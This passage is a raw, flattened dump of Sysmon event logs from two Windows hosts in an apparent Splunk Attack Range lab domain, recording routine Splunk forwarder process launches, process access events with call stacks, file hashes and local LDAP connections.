Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060781Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.559{7F8C56E7-5166-6063-1201-00000000AF01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060780Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:18.554{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48054C8309F17545CBFFAB6F937C9300,SHA256=E4AB71F7C12AE5EF6CA8A48483BB41D43BD7C6841D2F6207407AD8E323033934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245400Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:18.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4876F67C3FA9B740F250A2F3450A0217,SHA256=D5C1B10834DE45A1A89DCE69B850519F3822FB7ED3EB5A490D5258F14DA97B2A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060798Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5167-6063-1301-00000000AF01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060797Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060796Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060795Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060794Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060793Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-5167-6063-1301-00000000AF01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060792Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.933{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5167-6063-1301-00000000AF01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060791Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.935{7F8C56E7-5167-6063-1301-00000000AF01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060790Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:19.227{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F91E419983CF58DDF8E75CE7BA388DF,SHA256=6E44BA63462E24F50274DFD4B9B8D9C28883F72100AE18B32FCF6043A040A431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245403Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:19.906{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B881A8F6EFFF552A9A8989B9FB0E835C,SHA256=A9C9D66D3C0216B3A25F11D2E04567B34314853CE03B103AE92CE5EC8ED3BB2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245402Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:18.476{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64751-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245401Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:19.046{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C569F6F2E44871BF80C69FE94F0FE0F0,SHA256=FFB07315094A2EAB7381A2E6F488ABAD7AB318CCF46E15A8A661A16688A21856,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060810Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:17.835{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54764-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001060809Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:17.835{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54764-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 10341000x80000000000000001060808Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5168-6063-1401-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060807Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060806Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060805Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060804Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060803Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5168-6063-1401-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060802Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5168-6063-1401-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060801Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.623{7F8C56E7-5168-6063-1401-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060800Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.620{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0516647A1B4733146B3075C2BE6B32,SHA256=BB2A1F15340D71554C6555B78FC0D15252FA78A44174C7CD76387674AB5705E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060799Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:20.074{7F8C56E7-5167-6063-1301-00000000AF01}49724400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245417Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5168-6063-A322-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245416Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245415Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245414Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245413Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll